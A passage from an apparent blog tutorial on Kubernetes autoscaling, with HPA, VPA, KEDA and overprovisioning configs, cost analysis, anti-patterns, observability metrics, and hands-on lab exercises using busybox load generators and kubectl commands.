&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Fixed config applied at: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%T&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Re-run the spike&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://api-service; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done

&lt;/span&gt;watch &lt;span class="nt"&gt;-n3&lt;/span&gt; &lt;span class="s2"&gt;"
  echo '=== HPA ==='; kubectl get hpa api-service;
  echo '=== Pods ==='; kubectl get pods -l app=api-service;
  echo '=== Events (last 5) ==='; kubectl get events --sort-by='.lastTimestamp' | tail -5
"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Cleanup everything:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod spike-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done
&lt;/span&gt;kubectl delete deployment api-service php-apache hamster &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete hpa api-service php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete vpa api-service-vpa hamster-vpa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete svc api-service php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Choosing an Autoscaling Strategy
&lt;/h2&gt;

&lt;p&gt;Given a workload, how do you decide what to configure? The right answer depends on the workload's scheduling properties, traffic shape, and operational risk tolerance — not on what's easiest to configure.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Workload is stateless and traffic is spiky?
  → HPA with external metric (RPS or queue depth)
  → Add CPU as a secondary ceiling if external pipeline is unreliable

Workload is stateful (database, queue, cache)?
  → VPA in Off or Initial mode only — use recommendations to right-size at deploy time
  → HPA only if the workload supports safe horizontal scaling

Traffic is queue-driven (async workers, batch processors)?
  → KEDA with queue-depth metric — HPA's pull-based model is a poor fit for push-based work

Workload is latency-sensitive (p99 SLO &amp;lt; 100ms)?
  → HPA with headroom baked into the target (50% CPU or lower, not 80%)
  → Overprovisioning buffer to absorb the CA bootstrap window
  → VPA in Initial mode; never Auto

CPU-bound workload with well-understood load curve?
  → HPA on CPU is acceptable if: target ≤ 60%, minReplicas absorbs the reaction window,
     and VPA is on an orthogonal metric or in Off mode

You are starting from scratch with no load data?
  → VPA in Off mode for 1–2 full traffic cycles to collect recommendations
  → Use recommendations to set initial requests, then graduate to HPA
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
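&lt;p&gt;For the queue-driven branch of the decision tree, the configuration shape is a KEDA &lt;code&gt;ScaledObject&lt;/code&gt; rather than a raw HPA. A minimal sketch, assuming a RabbitMQ-backed worker; the deployment name, queue name, host, and target value are illustrative placeholders, not values from this post:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;# Hypothetical KEDA ScaledObject scaling a worker Deployment on queue depth
apiVersion: keda.sh/v1alpha1
kind: ScaledObject
metadata:
  name: queue-worker-scaler          # placeholder
spec:
  scaleTargetRef:
    name: queue-worker               # placeholder Deployment
  minReplicaCount: 1
  maxReplicaCount: 50                # explicit cost ceiling
  triggers:
  - type: rabbitmq
    metadata:
      host: amqp://user:pass@rabbitmq:5672/   # placeholder connection
      queueName: jobs                # placeholder queue
      mode: QueueLength
      value: "20"                    # target messages per replica
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;KEDA still materializes an HPA under the hood, but the scaling signal tracks the backlog directly rather than a lagging resource proxy.&lt;/p&gt;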



&lt;p&gt;&lt;strong&gt;The general principle&lt;/strong&gt;: configure autoscaling conservatively (lower CPU targets, wider stabilization windows, explicit &lt;code&gt;maxReplicas&lt;/code&gt;) and then loosen based on observed behavior. The failure modes of over-conservative configuration (slightly higher cost, slightly slower reaction) are far more recoverable than the failure modes of over-aggressive configuration (oscillation, cascading evictions, CA thrash).&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Production Design Pattern: A Battle-Tested Reference Architecture
&lt;/h2&gt;

&lt;p&gt;For a stateless, latency-sensitive service that you want to operate safely at scale:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# HPA: scale on RPS, not CPU&lt;/span&gt;
&lt;span class="na"&gt;metrics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;External&lt;/span&gt;
  &lt;span class="na"&gt;external&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;metric&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;http_requests_per_second&lt;/span&gt;
    &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AverageValue&lt;/span&gt;
      &lt;span class="na"&gt;averageValue&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;400"&lt;/span&gt;

&lt;span class="c1"&gt;# Scaling policies: don't surge, don't collapse&lt;/span&gt;
&lt;span class="na"&gt;behavior&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;scaleUp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;50&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
    &lt;span class="na"&gt;selectPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Min&lt;/span&gt;
  &lt;span class="na"&gt;scaleDown&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;stabilizationWindowSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;300&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;120&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pair this with VPA in &lt;code&gt;Initial&lt;/code&gt; mode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;updatePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;updateMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Initial"&lt;/span&gt;   &lt;span class="c1"&gt;# inject at pod creation, never evict running pods&lt;/span&gt;
&lt;span class="na"&gt;resourcePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containerPolicies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;containerName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;*"&lt;/span&gt;
    &lt;span class="na"&gt;minAllowed&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;100m&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;256Mi&lt;/span&gt;       &lt;span class="c1"&gt;# anchored to load test p99&lt;/span&gt;
    &lt;span class="na"&gt;maxAllowed&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;4Gi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And complete the stack with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CA warm pool or overprovisioning buffer&lt;/strong&gt; (low-priority placeholder pods that get evicted first, keeping spare capacity pre-warmed)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CPU requests tuned to p50 load&lt;/strong&gt; (not observed idle), informed by VPA recommendations after a full traffic cycle&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;--scale-down-delay-after-add&lt;/code&gt;&lt;/strong&gt; on CA set to at least 10 minutes to prevent thrashing after a provisioning event&lt;/li&gt;
&lt;/ul&gt;
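&lt;p&gt;The overprovisioning buffer in the first bullet is typically just a negative-priority &lt;code&gt;PriorityClass&lt;/code&gt; plus a &lt;code&gt;Deployment&lt;/code&gt; of pause containers. A minimal sketch; the replica count and requests are illustrative and should be sized from your own load tests:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: scheduling.k8s.io/v1
kind: PriorityClass
metadata:
  name: overprovisioning
value: -10                 # below default (0), so these pods are evicted first
globalDefault: false
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: overprovisioning-buffer
spec:
  replicas: 3              # placeholder: expected peak minus baseline replicas
  selector:
    matchLabels:
      app: overprovisioning-buffer
  template:
    metadata:
      labels:
        app: overprovisioning-buffer
    spec:
      priorityClassName: overprovisioning
      containers:
      - name: pause
        image: registry.k8s.io/pause:3.9
        resources:
          requests:
            cpu: 500m      # placeholder: match the real workload's footprint
            memory: 512Mi
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;When real pods go &lt;code&gt;Pending&lt;/code&gt;, the scheduler preempts these placeholders immediately, and CA then provisions a replacement node for the displaced buffer pods in the background.&lt;/p&gt;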

&lt;p&gt;This architecture means HPA scales on a signal with no CPU-request coupling, VPA rightsizes without disrupting running pods, and CA only sees pressure from genuine, sustained scheduling demand.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cost Dynamics of Autoscaling
&lt;/h2&gt;

&lt;p&gt;Autoscalers have no cost objective — they optimize to keep metrics within bounds. This means cost consequences are entirely a function of how you constrain them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HPA cost profile&lt;/strong&gt;: Over-scaling costs money (idle pods billed at full rate). Under-scaling costs SLO attainment. The tradeoff is asymmetric: SLO violations have reputational and sometimes contractual consequences; idle capacity has a predictable cost. Most production systems err toward over-scaling by design, using &lt;code&gt;minReplicas&lt;/code&gt; floors that keep pods warm even during off-peak hours. The cost of that floor is the explicit price of low-latency reaction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VPA cost profile&lt;/strong&gt;: VPA's cost impact is indirect and counterintuitive. By inflating &lt;code&gt;requests&lt;/code&gt;, VPA can reduce bin-packing efficiency — larger requests mean fewer pods per node, which means more nodes for the same actual workload. The mechanism: CA provisions for &lt;em&gt;request&lt;/em&gt; pressure, not &lt;em&gt;usage&lt;/em&gt; pressure. A cluster running at 30% actual CPU utilization but 90% request utilization looks fully packed to CA. VPA can worsen this by pushing requests upward toward observed peaks. Track both actual utilization and request utilization as separate metrics.&lt;/p&gt;
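&lt;p&gt;A sketch of the two queries, assuming kube-state-metrics and cAdvisor metrics are scraped (exact metric and label names vary by metrics-stack version):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Actual CPU utilization: what the workload really consumes
sum(rate(container_cpu_usage_seconds_total{container!=""}[5m]))
  / sum(kube_node_status_allocatable{resource="cpu"})

# Request utilization: the pressure CA actually provisions for
sum(kube_pod_container_resource_requests{resource="cpu"})
  / sum(kube_node_status_allocatable{resource="cpu"})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A large gap between the two is the bin-packing inefficiency described above, and it is where VPA-inflated requests show up first.&lt;/p&gt;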

&lt;p&gt;&lt;strong&gt;CA cost profile&lt;/strong&gt;: CA cost is a step function — it changes in node increments. This creates a zone of structural over-provisioning: the last node in a pool will typically carry only whatever load couldn't fit elsewhere, but it is billed the same as a fully loaded node. Overprovisioning buffer pods deliberately fill this slack, converting the wasted allocation into controlled headroom rather than accidental waste.&lt;/p&gt;
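&lt;p&gt;A worked example of the step function, with illustrative numbers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Node shape: 4 vCPU, ~3.5 vCPU allocatable after system reservations
Pod requests: 500m CPU each  →  7 pods fit per node

28 pods → ceil(28 / 7) = 4 nodes, fully packed
29 pods → ceil(29 / 7) = 5 nodes: the fifth node carries a single pod
          but is billed the same as the other four
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;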

&lt;p&gt;&lt;strong&gt;The lever most teams forget&lt;/strong&gt;: &lt;code&gt;maxAllowed&lt;/code&gt; in VPA and &lt;code&gt;maxReplicas&lt;/code&gt; in HPA are your primary cost controls. Without explicit upper bounds, both systems will scale toward whatever is needed to satisfy the metric — with no regard for what that costs. Set these bounds based on cost budgets, not just technical ceilings.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What Experienced Engineers Actually Do
&lt;/h2&gt;

&lt;p&gt;Theory and configuration syntax are table stakes. The harder-won knowledge is what practitioners actually run in production after a few incidents:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On metric selection&lt;/strong&gt;: RPS or queue depth as the primary HPA signal, with CPU as a secondary ceiling to catch cases where the metrics pipeline has gaps or delays. CPU-only HPA is treated as a legacy pattern to migrate away from when the metrics infrastructure is available.&lt;/p&gt;
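&lt;p&gt;In &lt;code&gt;autoscaling/v2&lt;/code&gt; this is just two entries in the &lt;code&gt;metrics&lt;/code&gt; list: HPA computes a desired replica count per metric and takes the maximum, so whichever signal demands more replicas drives the decision. A sketch (the metric name and targets are illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;metrics:
- type: External                 # primary signal: RPS via an external
  external:                      # metrics adapter
    metric:
      name: http_requests_per_second
    target:
      type: AverageValue
      averageValue: "400"
- type: Resource                 # secondary ceiling: still drives scale-up
  resource:                      # if the metrics pipeline has gaps or delays
    name: cpu
    target:
      type: Utilization
      averageUtilization: 60
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;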

&lt;p&gt;&lt;strong&gt;On VPA modes&lt;/strong&gt;: &lt;code&gt;Initial&lt;/code&gt; only for production workloads. &lt;code&gt;Auto&lt;/code&gt; mode is reserved for non-critical batch workloads or development environments where evictions are acceptable. The workflow for using VPA in production is: run in &lt;code&gt;Off&lt;/code&gt; mode for two to four weeks across a full traffic cycle, collect recommendations, apply them to manifests via GitOps during a low-traffic window, and re-evaluate quarterly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On request sizing&lt;/strong&gt;: &lt;code&gt;minAllowed&lt;/code&gt; in VPA is always anchored to load test p99 observed usage, not to VPA's recommendation from off-peak periods. This prevents VPA from shrinking requests toward near-zero values observed at 3am and then evicting pods at 9am when the requests no longer fit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On CA and warm capacity&lt;/strong&gt;: Overprovisioning buffer pods (low-priority &lt;code&gt;Deployment&lt;/code&gt; + negative &lt;code&gt;PriorityClass&lt;/code&gt;) are standard practice at any org that has been burned by CA bootstrap lag during a traffic event. The sizing is calibrated from load tests: buffer = expected peak replica count minus baseline replica count, sized for the workload's request footprint.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On stabilization&lt;/strong&gt;: Scale-down &lt;code&gt;stabilizationWindowSeconds&lt;/code&gt; of 300s (the default) is treated as a floor, not a ceiling. For services with expensive startup (JVM warmup, cache population), it is extended to 600–900s to prevent premature scale-in during multi-wave traffic patterns.&lt;/p&gt;
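&lt;p&gt;The extension is a single field on the HPA; an illustrative value for a slow-starting JVM service:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;behavior:
  scaleDown:
    stabilizationWindowSeconds: 900   # 600-900s for expensive startup;
                                      # the default is 300s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;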

&lt;p&gt;&lt;strong&gt;On observability&lt;/strong&gt;: Alerting on &lt;code&gt;ScalingLimited=True&lt;/code&gt; for more than two minutes, sustained &lt;code&gt;Pending&lt;/code&gt; pods, and rising &lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; before VPA recommendations are trusted. The debugging workflow is always: metrics first, then events, then pod resource comparison, then cross-loop interaction analysis.&lt;/p&gt;
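&lt;p&gt;The &lt;code&gt;ScalingLimited&lt;/code&gt; alert, for instance, can be expressed as a Prometheus rule, assuming kube-state-metrics exposes the HPA condition metric (label names vary slightly across kube-state-metrics versions):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;groups:
- name: autoscaling
  rules:
  - alert: HPAScalingLimited
    expr: kube_horizontalpodautoscaler_status_condition{condition="ScalingLimited",status="true"} == 1
    for: 2m                       # matches the two-minute threshold above
    labels:
      severity: warning
    annotations:
      summary: "HPA {{ $labels.horizontalpodautoscaler }} has been scaling-limited for 2m"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;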




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Misconfigurations
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  HPA Anti-Patterns
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CPU target above 75%&lt;/strong&gt;: Leaves insufficient headroom for the ~90–120s reaction time pipeline. The service is already degraded before new pods serve traffic.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No scaleUp policies&lt;/strong&gt;: Allows HPA to multiply replicas in a single cycle, potentially overwhelming downstream dependencies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Using memory as a scale-out trigger&lt;/strong&gt;: Memory-based HPA often fails to scale back in because most applications do not release allocated memory after load drops — the process holds the heap. HPA will see sustained high memory utilization and resist scale-in indefinitely. Use memory as an HPA metric only if you have confirmed your application actively releases memory under reduced load.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Not accounting for pod warm-up&lt;/strong&gt;: A newly scheduled pod is not immediately useful. If your service has a slow startup (JVM warmup, cache population), include &lt;code&gt;minReadySeconds&lt;/code&gt; and configure readiness probes that reflect actual traffic-readiness.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  VPA Anti-Patterns
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Auto mode on stateful workloads&lt;/strong&gt;: Eviction of a database or queue pod mid-operation is a data risk. Use &lt;code&gt;Off&lt;/code&gt; or &lt;code&gt;Initial&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No &lt;code&gt;minAllowed&lt;/code&gt;&lt;/strong&gt;: Without a lower bound, VPA will shrink requests toward observed minimums, which may be near zero during off-peak hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Switching to Auto during peak traffic&lt;/strong&gt;: Triggers an immediate wave of evictions. Always test mode changes in off-peak windows.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Combining with CPU-based HPA&lt;/strong&gt;: Creates the feedback loop described earlier. Use orthogonal metrics.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Observability: Metrics That Matter
&lt;/h2&gt;

&lt;p&gt;Autoscaling is only debuggable if you are measuring the right signals. The closing principle of this post — that the goal is observability, not perfect configuration — requires knowing exactly which metrics to watch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HPA signals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;kube_horizontalpodautoscaler_status_desired_replicas&lt;/code&gt; vs &lt;code&gt;kube_horizontalpodautoscaler_status_current_replicas&lt;/code&gt; — the gap between these is your scale lag in real time&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;kube_horizontalpodautoscaler_status_condition&lt;/code&gt; — surfaces &lt;code&gt;ScalingLimited&lt;/code&gt;, &lt;code&gt;AbleToScale&lt;/code&gt;, and &lt;code&gt;ScalingActive&lt;/code&gt; conditions; &lt;code&gt;ScalingLimited&lt;/code&gt; means rate policies or min/max bounds are constraining HPA from reaching its desired count&lt;/li&gt;
&lt;li&gt;The raw metric value vs the target threshold for each configured metric — monitor these independently to catch noisy metrics driving unexpected scale decisions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;VPA signals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;VPA.status.recommendation.containerRecommendations[].target&lt;/code&gt; vs actual pod requests — the gap is your rightsizing debt&lt;/li&gt;
&lt;li&gt;Eviction events on VPA-managed pods (&lt;code&gt;kubectl get events --field-selector reason=Evicted&lt;/code&gt;) — unexpected eviction frequency signals too-aggressive bounds or PDB misconfiguration&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; — a high value means VPA's CPU observation is artificially suppressed; recommendations cannot be trusted until throttling is resolved&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;kube_pod_container_status_last_terminated_reason{reason="OOMKilled"}&lt;/code&gt; — indicates VPA memory recommendations are too low or &lt;code&gt;minAllowed&lt;/code&gt; is not set correctly&lt;/li&gt;
&lt;/ul&gt;
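&lt;p&gt;For the lab workload from the exercises, the rightsizing debt can be eyeballed with two commands (adjust the object names for your own workloads):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# VPA's current target recommendation
kubectl get vpa api-service-vpa \
  -o jsonpath='{.status.recommendation.containerRecommendations[*].target}'

# The requests the pods are actually running with
kubectl get pods -l app=api-service \
  -o jsonpath='{.items[*].spec.containers[*].resources.requests}'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;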

&lt;p&gt;&lt;strong&gt;Cross-loop signals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;kube_pod_status_phase{phase="Pending"}&lt;/code&gt; with the &lt;code&gt;PodScheduled&lt;/code&gt; condition reason &lt;code&gt;Unschedulable&lt;/code&gt; — the trigger condition for CA; sustained Pending pods mean either CA is bootstrapping or no node shape can fit the requested resources&lt;/li&gt;
&lt;li&gt;Node instance type distribution over time — VPA-driven request inflation silently changing your node pool shape will appear here before it appears in cost reports&lt;/li&gt;
&lt;/ul&gt;
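&lt;p&gt;The instance-type distribution can be derived from node labels, assuming kube-state-metrics is configured to export them (node labels require an explicit &lt;code&gt;--metric-labels-allowlist&lt;/code&gt; on kube-state-metrics v2+):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Count of nodes per instance type over time
count by (label_node_kubernetes_io_instance_type) (kube_node_labels)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;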




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 12: Interrogate HPA Status Conditions
&lt;/h3&gt;

&lt;p&gt;Practice reading the HPA status conditions that appear in production debugging. These conditions surface the internal state of the control loop.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Assuming php-apache HPA still exists (or recreate it)&lt;/span&gt;
kubectl autoscale deployment php-apache &lt;span class="nt"&gt;--cpu-percent&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 &lt;span class="nt"&gt;--min&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;--max&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2 2&amp;gt;/dev/null &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# Read the full status conditions&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.status.conditions}'&lt;/span&gt; | python3 &lt;span class="nt"&gt;-m&lt;/span&gt; json.tool

&lt;span class="c"&gt;# Drive it to its maxReplicas to trigger ScalingLimited&lt;/span&gt;
kubectl run limit-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://php-apache; sleep 0.01; done"&lt;/span&gt;

&lt;span class="c"&gt;# Wait for HPA to hit maxReplicas=2, then check conditions&lt;/span&gt;
&lt;span class="nb"&gt;sleep &lt;/span&gt;60
kubectl describe hpa php-apache | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A20&lt;/span&gt; &lt;span class="s2"&gt;"Conditions:"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


